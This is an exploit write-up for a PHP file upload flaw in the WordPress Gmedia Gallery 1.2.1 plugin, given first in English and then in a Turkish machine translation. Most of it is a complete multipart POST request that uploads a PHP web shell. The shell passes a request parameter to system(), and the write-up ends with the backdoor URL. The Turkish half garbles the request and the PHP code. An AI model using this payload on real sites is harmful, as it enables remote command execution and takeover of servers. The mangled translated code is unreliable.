Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
Türkçe
Kod:
# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.codeasily.com/
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip
# Date : 2014-08-01
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description :
Any user could upload php files (administrator by default).
######################
# Vulnerability Disclosure Timeline:
2014-08-01: Discovered vulnerability
2014-08-01: Vendor Notification (Twitter)
2014-08-01: Vendor Response/Feedback
2014-08-02: Vendor Fix/Patch
2014-08-02: Public Disclosure
######################
# PoC:
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia
Content-Length=916
Content-Type=multipart/form-data; boundary=---------------------------304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------304431219031197
Content-Disposition: form-data; name="name"
.shell.php
-----------------------------304431219031197
Content-Disposition: form-data; name="chunk"
0
-----------------------------304431219031197
Content-Disposition: form-data; name="chunks"
1
-----------------------------304431219031197
Content-Disposition: form-data; name="params"
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=
-----------------------------304431219031197
Content-Disposition: form-data; name="file"; filename=".shell.php"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
-----------------------------304431219031197--
Backdoor location:
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwdTürkçe
Kod:
# Başlık Exploit: Wordpress Gmedia Galeri Shell Upload Güvenlik Açığı 1.2.1
# Yazar Exploit: Claudio Viviani
# Satıcı Web Sitesi: http://www.codeasily.com/
# Yazılım Link: http://downloads.wordpress.org/plugin/grand-media.zip
# Tarih: 2014/08/01
Windows 7 / Mozilla Firefox: # üzerinde test edilmiştir
######################
# Açıklama:
Herhangi bir kullanıcı php dosyalarını (varsayılan olarak yönetici) yükleyebilir.
######################
# Güvenlik Açığı Bilgilendirme Timeline:
2014/08/01: Discovered açığı
2014/08/01: Satıcı Bildirim (Twitter)
2014/08/01: Satıcı Tepki / Geri Bildirim
2014/08/02: Satıcı Fix / Patch
2014/08/02: Kamuyu Aydınlatma
######################
# PoC:
POST
= 127.0.0.1 ev sahipliği
User-Agent = Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 31.0) Gecko / 20100101 Firefox / 31,0
Kabul = text / html, application / xhtml + xml, uygulama / xml; q = 0.9, * / *, q = 0.8
Accept-Language = it-IT, o; q = 0.8, en-US; q = 0.5, tr, q = 0.3
Accept-Encoding = gzip, deflate
Referans = http:? //127.0.0.1/wordpress/wp-Admin/admin.php sayfa = GrandMedia_AddMedia
İçerik-Uzunluk = 916
Content-Type = multipart / form-data; sınır = --------------------------- 304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie = WP + Çerez + kontrol edin; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-ayarları-time-1 = 1406915840
Bağlantı = canlı tutma
Pragma = no-cache
Cache-Control no-cache =
PostData = ----------------------------- 304431219031197
Content-Disposition: form-data; = "isim" adı
.shell.php
----------------------------- 304431219031197
Content-Disposition: form-data; name = "yığın"
0
----------------------------- 304431219031197
Content-Disposition: form-data; name = "topakları"
1
----------------------------- 304431219031197
Content-Disposition: form-data; name = "params"
terimler% 5Bgmedia_category% 5D = & terimler% 5Bgmedia_album% 5D = & terimler% 5Bgmedia_tag% 5D =
----------------------------- 304431219031197
Content-Disposition: form-data; = "file" adını; filename = ". shell.php"
Content-Type: application / octet-stream
<? php
if (isset ($ _ İSTEK) ['cmd']) {
"<pre> echo";
$ cmd = ($ _REQUEST ['cmd']);
sistemi ($ cmd);
echo "</ pre>";
die;
}
?>
----------------------------- 304431219031197--
Backdoor konumu:
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd